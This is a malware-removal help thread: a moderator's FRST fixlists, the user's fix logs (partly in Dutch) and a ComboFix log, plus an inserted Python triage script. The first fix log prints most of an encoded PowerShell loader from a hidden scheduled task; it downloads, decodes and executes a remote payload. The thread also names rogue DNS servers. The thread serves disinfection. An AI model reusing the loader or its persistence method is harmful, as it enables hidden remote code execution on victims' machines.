Essexboy
GeekU Moderator
Let me know if defender still reports after this

CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.

Open notepad and copy/paste the text in the quotebox below into it:


CreateRestorePoint:
Tcpip\Parameters: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{B12B7109-6CCC-4B7F-B62A-9DCD9AB7A826}: [NameServer] 82.163.142.3 95.211.158.130
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.searchcompletion.com/?si=16615&home=true
SearchScopes: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = hxxp://search.searchcompletion.com/?si=16615&chrome=true&q={searchTerms}
BHO: Geen Naam -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> Geen bestand
Toolbar: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> Geen Naam - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - Geen bestand
2015-12-19 14:20 - 2015-12-19 14:20 - 0000000 _____ () C:\Users\Thomas\AppData\Local\{DC0B4DB1-A5EB-4CF1-A01B-0882609F4995}
Task: {397422DB-C117-4E84-99CD-C19801182DA8} - System32\Tasks\{8B4D71D3-DC18-FA14-C88F-B60E35A1D3FA} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand [base64-encoded command removed]
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
RemoveProxy:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
CMD: bitsadmin /reset /allusers


Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated; please post that.
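Triage aid for the `Task:` and `Tcpip` entries that the fixlist above removes, as an added example (not part of Essexboy's post or of FRST): it flags PowerShell tasks launched hidden with an `-EncodedCommand` argument, decodes that argument for reading without running it, and lists static `[NameServer]` values. The sample lines, `triage` and the other function names are constructed for illustration.

```python
import base64
import re

# Constructed sample input in FRST's "Task:" / "Tcpip" line layout (not taken from this thread's log).
SAMPLE_PS = 'Write-Output "constructed sample"; $u="http://example.invalid/u/?q=1"'
SAMPLE_B64 = base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = [
    r"Task: {00000000-0000-0000-0000-000000000001} - System32\Tasks\{CONSTRUCTED} => "
    "powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass "
    "-EncodedCommand " + SAMPLE_B64,
    r"Task: {00000000-0000-0000-0000-000000000002} - System32\Tasks\Updater => C:\Program Files\App\update.exe",
    r"Tcpip\Parameters: [NameServer] 192.0.2.53 198.51.100.53",
    r"Tcpip\Parameters: [DhcpNameServer] 192.168.1.1",
]


def encoded_arg(cmdline):
    """Return the argument of -EncodedCommand (or an abbreviation PowerShell accepts), if any."""
    for m in re.finditer(r"(?i)(?<!\S)-(e\w*)\s+(\S+)", cmdline):
        flag = m.group(1).lower()
        # -e, -en, -enc ... are prefixes of the parameter name; -ec is its alias.
        if flag == "ec" or "encodedcommand".startswith(flag):
            return m.group(2)
    return None


def decode_encoded_command(b64):
    """Decode for reading only. PowerShell expects base64 over UTF-16LE text.

    Blobs pasted into forum posts are often truncated, so repair the length
    instead of failing: drop a dangling character, re-pad, drop an odd byte.
    """
    b64 = re.sub(r"[^A-Za-z0-9+/]", "", b64)
    if len(b64) % 4 == 1:
        b64 = b64[:-1]
    b64 += "=" * (-len(b64) % 4)
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - len(raw) % 2]
    return raw.decode("utf-16-le", errors="replace")


def defang(url):
    """Write URLs the way the thread does (hxxp://) so they are not clickable."""
    return re.sub(r"(?i)^http", "hxxp", url)


def triage(lines):
    """Return one finding per suspicious Task line or static NameServer line."""
    findings = []
    for no, line in enumerate(lines, 1):
        if line.startswith("Task:") and "=>" in line:
            cmd = line.split("=>", 1)[1]
            if not re.search(r"(?i)\bpowershell(\.exe)?\b", cmd):
                continue
            reasons = []
            if re.search(r"(?i)(?<!\S)-w\w*\s+hidden\b", cmd):
                reasons.append("hidden window")
            if re.search(r"(?i)(?<!\S)-e[xp]\w*\s+bypass\b", cmd):
                reasons.append("execution policy bypass")
            decoded, urls = None, []
            arg = encoded_arg(cmd)
            if arg:
                reasons.append("encoded command")
                decoded = decode_encoded_command(arg)
                urls = [defang(u) for u in re.findall(r"https?://[^\s\"'<>]+", decoded)]
            if reasons:
                findings.append({"line": no, "kind": "powershell-task",
                                 "reasons": reasons, "decoded": decoded, "urls": urls})
            continue
        # A static NameServer value overrides DHCP-assigned DNS; confirm it is one you set.
        m = re.match(r"Tcpip\\.*?:\s*\[NameServer\]\s+(.+)", line)
        if m:
            findings.append({"line": no, "kind": "static-dns", "servers": m.group(1).split()})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```
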

#3
Tommie

It seems the malware is gone. I can click on hyperlinks again via Chrome. The DLL message did just pop up again.

 

Hereby the results:

Fix resultaat van Farbar Recovery Scan Tool (x64) Versie:27-01-2016
Gestart door Thomas (2016-01-31 16:39:39) Run:1
Gestart vanaf C:\Users\Thomas\Desktop
Geladen Profielen: Thomas (Beschikbare Profielen: Thomas & Farah)
Boot Modus: Normal
==============================================
 
fixlist inhoud:
*****************
CreateRestorePoint:
Tcpip\Parameters: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{B12B7109-6CCC-4B7F-B62A-9DCD9AB7A826}: [NameServer] 82.163.142.3 95.211.158.130
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.searchcompletion.com/?si=16615&home=true
SearchScopes: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = hxxp://search.searchcompletion.com/?si=16615&chrome=true&q={searchTerms}
BHO: Geen Naam -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> Geen bestand
Toolbar: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000 -> Geen Naam - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - Geen bestand
2015-12-19 14:20 - 2015-12-19 14:20 - 0000000 _____ () C:\Users\Thomas\AppData\Local\{DC0B4DB1-A5EB-4CF1-A01B-0882609F4995}
Task: {397422DB-C117-4E84-99CD-C19801182DA8} - System32\Tasks\{8B4D71D3-DC18-FA14-C88F-B60E35A1D3FA} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand [base64-encoded command removed]
FIAawBLAFcAcABBAHcASgBuAFYAXwB5AEMAZwBwADUAZgBpAFUAQwAtAGgAawBOADAAbABtAEgANABpAEgAdQAtADkAQQBDAFEAdwBPAFMAVwBoAEcAeQA3AGgANQBjAGUANAA3AGwAdQAxAEEAaQB2ADUAQwBYADAAbQBZAGMAMgBDADgAcQBmAFgARgBHAFMAeABmADMAdAB1AEMAVQBRAFUAMAB3ADMAcwBHAEcAawBBAEsAOQBmAGcAaABXAGUAagAxADAATQB2ADYATABqAEUAUgBtADAANwBVADkAXwBPAHQAaQBsAFgAYgBnAEgAcwBpAEoAMQB4AHIAdABhAGoATQA1AGIAOQB2ADIAWgBrAFUAcQBDAHgAVABHADkANwBkAFYANgBjAG0AZABVAE8AVgBKAHAAZwBPAHAASABMAF8ATgB0AHEAUgBOAHYAawBVAFQAZABEAFUAcQByAEEAbgBQAG0AeQBFAEoAcQBHAGIAOAA3AGQAZQBxADEARgBoAGYAawBoAHIAUgBaAEkATQA0AFUASwBqAEwAdABrAEcARQAxAGIASAAyAFEAXwA0AEkAbABRAHEANgBqAFMAdgBtADAAVwByADIAXwBrAGUAYQB0AFYAWgB1AHkAZwBaAGQAOABjAFcAQwBNAEsARwBjAGoAZwBfAGgAMQB5ADcANQByADQAQwBBAEMALQB3ADQAbwBhAE8AdQBjAFEAMwBKAGsAcQBrAFMAdAAyAGcAOQBGADcASgBEAEEASQBXAGoAZQB2AHcAbgBzAEsAMwBXAHAATwBwAEgAJgByAD0ANAA5ADMAMgA0ADYAMgAzADMANgA3ADIAMAAzADcAOQA1ADgAMAAiADsAJABzAHQAcwBrAD0AIgB7ADgAQgA0AEQANwAxAEQAMwAtAEQAQwAxADgALQBGAEEAMQA0AC0AQwA4ADgARgAtAEIANgAwAEUAMwA1AEEAMQBEADMARgBBAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3A
HMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
RemoveProxy:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
CMD: bitsadmin /reset /allusers
*****************
 
Herstelpunt is succesfol gemaakt.
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer => waarde is succesvol verwijderd.
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B12B7109-6CCC-4B7F-B62A-9DCD9AB7A826}\\NameServer => waarde is succesvol verwijderd.
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => waarde met succes hersteld
"HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{3BD44F0E-0596-4008-AEE0-45D47E3A8F0E}" => sleutel is succesvol verwijderd.
HKCR\CLSID\{3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} => sleutel niet gevonden. 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => sleutel is succesvol verwijderd.
HKCR\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9} => sleutel niet gevonden. 
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => waarde is succesvol verwijderd.
HKCR\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => sleutel niet gevonden. 
C:\Users\Thomas\AppData\Local\{DC0B4DB1-A5EB-4CF1-A01B-0882609F4995} => is succesvol verplaatst.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{397422DB-C117-4E84-99CD-C19801182DA8}" => sleutel is succesvol verwijderd.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{397422DB-C117-4E84-99CD-C19801182DA8}" => sleutel is succesvol verwijderd.
C:\Windows\System32\Tasks\{8B4D71D3-DC18-FA14-C88F-B60E35A1D3FA} => is succesvol verplaatst.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{8B4D71D3-DC18-FA14-C88F-B60E35A1D3FA}" => sleutel is succesvol verwijderd.
 
========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========
 
De bewerking is voltooid.
 
 
 
========= Eind van Reg: =========
 
 
========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========
 
De bewerking is voltooid.
 
 
 
========= Eind van Reg: =========
 
 
========= Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F =========
 
De bewerking is voltooid.
 
 
 
========= Eind van Reg: =========
 
 
========= RemoveProxy: =========
 
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => waarde is succesvol verwijderd.
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => waarde is succesvol verwijderd.
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => waarde is succesvol verwijderd.
HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => waarde is succesvol verwijderd.
 
 
========= Eind van RemoveProxy: =========
 
 
=========  netsh advfirewall reset =========
 
OK.
 
 
========= Eind van CMD: =========
 
 
=========  netsh advfirewall set allprofiles state ON =========
 
OK.
 
 
========= Eind van CMD: =========
 
 
=========  ipconfig /flushdns =========
 
 
Windows IP-configuratie
 
De DNS-omzettingscache is leeggemaakt.
 
========= Eind van CMD: =========
 
 
=========  netsh winsock reset catalog =========
 
 
De Winsock-catalogus is opnieuw ingesteld.
De computer dient opnieuw te worden opgestart om het opnieuw instellen te voltooien.
 
 
========= Eind van CMD: =========
 
 
=========  netsh int ip reset c:\resetlog.txt =========
 
Het opnieuw instellen van Algemeen is geslaagd.
Het opnieuw instellen van Interface is geslaagd.
Het opnieuw instellen van Unicastadres is geslaagd.
Het opnieuw instellen van Route is geslaagd.
De computer dient opnieuw te worden opgestart om deze actie te voltooien.
 
 
========= Eind van CMD: =========
 
 
=========  ipconfig /release =========
 
 
Windows IP-configuratie
 
Er kan geen enkele bewerking op de Draadloze netwerkverbinding 2 worden uitgevoerd als
het medium ervan niet is aangesloten.
Er kan geen enkele bewerking op de LAN-verbinding worden uitgevoerd als
het medium ervan niet is aangesloten.
 
Draadloos LAN-adapter voor Draadloze netwerkverbinding 2:
 
   Mediumstatus. . . . . . . . . . . : medium ontkoppeld
   Verbindingsspec. DNS-achtervoegsel: 
 
Draadloos LAN-adapter voor Draadloze netwerkverbinding:
 
   Verbindingsspec. DNS-achtervoegsel: 
   IPv6-adres. . . . . . . . . . . . : 2001:982:61d6:1:3050:ab40:6fb:c152
   Link-local IPv6-adres . . . . . . : fe80::3050:ab40:6fb:c152%14
   Standaardgateway. . . . . . . . . : fe80::c225:6ff:fe6a:b446%14
 
Ethernet-adapter voor LAN-verbinding:
 
   Mediumstatus. . . . . . . . . . . : medium ontkoppeld
   Verbindingsspec. DNS-achtervoegsel: arnhem.chello.nl
 
Tunnel-adapter voor isatap.fritz.box:
 
   Mediumstatus. . . . . . . . . . . : medium ontkoppeld
   Verbindingsspec. DNS-achtervoegsel: 
 
Tunnel-adapter voor isatap.{0E4B5A16-F9A0-405C-8E25-CF34DB25E83E}:
 
   Mediumstatus. . . . . . . . . . . : medium ontkoppeld
   Verbindingsspec. DNS-achtervoegsel: 
 
Tunnel-adapter voor isatap.arnhem.chello.nl:
 
   Mediumstatus. . . . . . . . . . . : medium ontkoppeld
   Verbindingsspec. DNS-achtervoegsel: 
 
========= Eind van CMD: =========
 
 
=========  ipconfig /renew =========
 
 
Windows IP-configuratie
 
Er kan geen enkele bewerking op de Draadloze netwerkverbinding 2 worden uitgevoerd als
het medium ervan niet is aangesloten.
Er kan geen enkele bewerking op de LAN-verbinding worden uitgevoerd als
het medium ervan niet is aangesloten.
 
Draadloos LAN-adapter voor Draadloze netwerkverbinding 2:
 
   Mediumstatus. . . . . . . . . . . : medium ontkoppeld
   Verbindingsspec. DNS-achtervoegsel: 
 
Draadloos LAN-adapter voor Draadloze netwerkverbinding:
 
   Verbindingsspec. DNS-achtervoegsel: fritz.box
   IPv6-adres. . . . . . . . . . . . : 2001:982:61d6:1:3050:ab40:6fb:c152
   Link-local IPv6-adres . . . . . . : fe80::3050:ab40:6fb:c152%14
   IPv4-adres. . . . . . . . . . . . : 192.168.178.32
   Subnetmasker. . . . . . . . . . . : 255.255.255.0
   Standaardgateway. . . . . . . . . : fe80::c225:6ff:fe6a:b446%14
                                       192.168.178.1
 
Ethernet-adapter voor LAN-verbinding:
 
   Mediumstatus. . . . . . . . . . . : medium ontkoppeld
   Verbindingsspec. DNS-achtervoegsel: arnhem.chello.nl
 
Tunnel-adapter voor isatap.fritz.box:
 
   Mediumstatus. . . . . . . . . . . : medium ontkoppeld
   Verbindingsspec. DNS-achtervoegsel: fritz.box
 
Tunnel-adapter voor isatap.{0E4B5A16-F9A0-405C-8E25-CF34DB25E83E}:
 
   Mediumstatus. . . . . . . . . . . : medium ontkoppeld
   Verbindingsspec. DNS-achtervoegsel: 
 
Tunnel-adapter voor isatap.arnhem.chello.nl:
 
   Mediumstatus. . . . . . . . . . . : medium ontkoppeld
   Verbindingsspec. DNS-achtervoegsel: 
 
========= Eind van CMD: =========
 
 
=========  netsh int ipv4 reset =========
 
Het opnieuw instellen van Interface is geslaagd.
De computer dient opnieuw te worden opgestart om deze actie te voltooien.
 
 
========= Eind van CMD: =========
 
 
=========  netsh int ipv6 reset =========
 
Het opnieuw instellen van Algemeen is geslaagd.
Het opnieuw instellen van Interface is geslaagd.
De computer dient opnieuw te worden opgestart om deze actie te voltooien.
 
 
========= Eind van CMD: =========
 
 
=========  bitsadmin /reset /allusers =========
 
 
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.
 
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
 
Unable to cancel {232F76FA-12F2-4CF6-B836-A935A6A9D920}.
{901B15EB-C6A4-4993-AFE0-22BD5F06F919} canceled.
{ACFDEAD3-B466-42E9-B533-EA433BC15F82} canceled.
{BB000BE9-C63A-4A22-86EB-2C11C845F069} canceled.
{CB28AC54-BA4C-47AE-9AB1-66AA1B971DA9} canceled.
{5C50AC6D-B0F6-4FF8-A711-E1067A56B1F1} canceled.
{3AD821A1-F38F-438A-861F-EFC74F50649E} canceled.
6 out of 7 jobs canceled.
 
========= Eind van CMD: =========
 
EmptyTemp: => 626.2 MB tijdelijke gegevens verwijderd.
 
 
Het systeem moest herstart worden.
 
==== Eind van Fixlog 16:41:57 ====

#4
Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
OK, let's run SFC on that file and see if that cures the problem.


CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.

Open notepad and copy/paste the text in the quotebox below into it:
 

CreateRestorePoint:
cmd: sfc /scanfile=C:\Windows\system32\rundll32.exe
cmd: sfc /scanfile=C:\Windows\SysWOW64\rundll32.exe
EmptyTemp:
CMD: bitsadmin /reset /allusers


Save this as fixlist.txt, in the same location as FRST.exe.
Run FRST and press Fix.
On completion a log will be generated; please post that.
#5
Tommie

    Member

  • Topic Starter
  • Member
  • PipPip
  • 39 posts

First of all, my thanks for replying so quickly! I really appreciate your help in this matter.

 

I just received the same DLL error again after I did the above.

 

The log:

 

Fix resultaat van Farbar Recovery Scan Tool (x64) Versie:27-01-2016
Gestart door Thomas (2016-01-31 18:54:58) Run:2
Gestart vanaf C:\Users\Thomas\Desktop
Geladen Profielen: Thomas (Beschikbare Profielen: Thomas & Farah)
Boot Modus: Normal
==============================================
 
fixlist inhoud:
*****************
CreateRestorePoint:
cmd: sfc /scanfile=C:\Windows\system32\rundll32.exe
cmd: sfc /scanfile=C:\Windows\SysWOW64\rundll32.exe
EmptyTemp:
CMD: bitsadmin /reset /allusers
*****************
 
Herstelpunt is succesfol gemaakt.
 
=========  sfc /scanfile=C:\Windows\system32\rundll32.exe =========
 
 
 
 
Er zijn geen schendingen van de integriteit gevonden.
 
 
========= Eind van CMD: =========
 
 
=========  sfc /scanfile=C:\Windows\SysWOW64\rundll32.exe =========
 
 
 
 
Er zijn geen schendingen van de integriteit gevonden.
 
 
========= Eind van CMD: =========
 
 
=========  bitsadmin /reset /allusers =========
 
 
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.
 
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
 
0 out of 0 jobs canceled.
 
========= Eind van CMD: =========
 
EmptyTemp: => 23.7 MB tijdelijke gegevens verwijderd.
 
 
Het systeem moest herstart worden.
 
==== Eind van Fixlog 18:55:35 ====

#6
Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts

OK, the files are sound. Are you still getting the warnings?


#7
Tommie

    Member

  • Topic Starter
  • Member
  • PipPip
  • 39 posts

Still getting the same error message. What can I do next?


#8
Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
OK, I believe all the malware is gone, but let's look deeper.

Download and Install Combofix

Download ComboFix from one of the following locations:
Link 1
Link 2

VERY IMPORTANT !!! Save ComboFix.exe to your Desktop

* IMPORTANT - Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. If you have difficulty properly disabling your protective programs, refer to this link here
  • When finished, it shall produce a log for you.
  • Please include the C:\ComboFix.txt in your next reply.
  • Notes:
    1. Do not mouse-click Combofix's window while it is running. That may cause it to stall.
    2. Do not "re-run" Combofix. If you have a problem, reply back for further instructions.

    3. If after the reboot you get errors about programmes being marked for deletion, then reboot; that will cure it.


    Please make sure you include the ComboFix log in your next reply, as well as describe how your computer is running now.

#9
Tommie

    Member

  • Topic Starter
  • Member
  • PipPip
  • 39 posts

So I started ComboFix. During the scan the DLL error came up again. After a while the error message disappeared again.

 

Hereby the results:

ComboFix 16-01-31.01 - Thomas 31-01-2016  23:12:58.1.4 - x64
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.31.1043.18.4023.1473 [GMT 1:00]
Gestart vanuit: c:\users\Thomas\Desktop\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
SP: Microsoft Security Essentials *Disabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((   Andere Verwijderingen   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\data
c:\users\Thomas\AppData\Local\TempDIR
c:\users\Thomas\AppData\Local\TempDIR\SecureW2_Enterprise_Client_359.exe
c:\windows\msdownld.tmp
.
.
((((((((((((((((((((   Bestanden Gemaakt van 2015-12-28 to 2016-01-31  ))))))))))))))))))))))))))))))
.
.
2016-01-31 22:23 . 2016-01-31 22:23 -------- d-----w- c:\users\Farah\AppData\Local\temp
2016-01-31 22:23 . 2016-01-31 22:23 -------- d-----w- c:\users\Default\AppData\Local\temp
2016-01-31 21:08 . 2016-01-31 21:08 75888 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0E75DAAF-4846-4051-952D-EC3A94910395}\offreg.980.dll
2016-01-31 19:16 . 2015-11-25 02:02 11154520 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0E75DAAF-4846-4051-952D-EC3A94910395}\mpengine.dll
2016-01-31 19:04 . 2015-08-05 17:56 22528 ----a-w- c:\windows\system32\icaapi.dll
2016-01-31 19:04 . 2015-08-05 17:06 39936 ----a-w- c:\windows\system32\drivers\tssecsrv.sys
2016-01-31 19:03 . 2015-12-16 18:55 69120 ----a-w- c:\windows\system32\nlsbres.dll
2016-01-31 19:03 . 2015-12-16 18:53 7168 ----a-w- c:\windows\system32\kbdgeoqw.dll
2016-01-31 19:03 . 2015-12-16 18:53 7168 ----a-w- c:\windows\system32\KBDAZEL.DLL
2016-01-31 19:03 . 2015-12-16 18:53 7168 ----a-w- c:\windows\system32\KBDAZE.DLL
2016-01-31 19:03 . 2015-12-16 18:48 6656 ----a-w- c:\windows\SysWow64\kbdgeoqw.dll
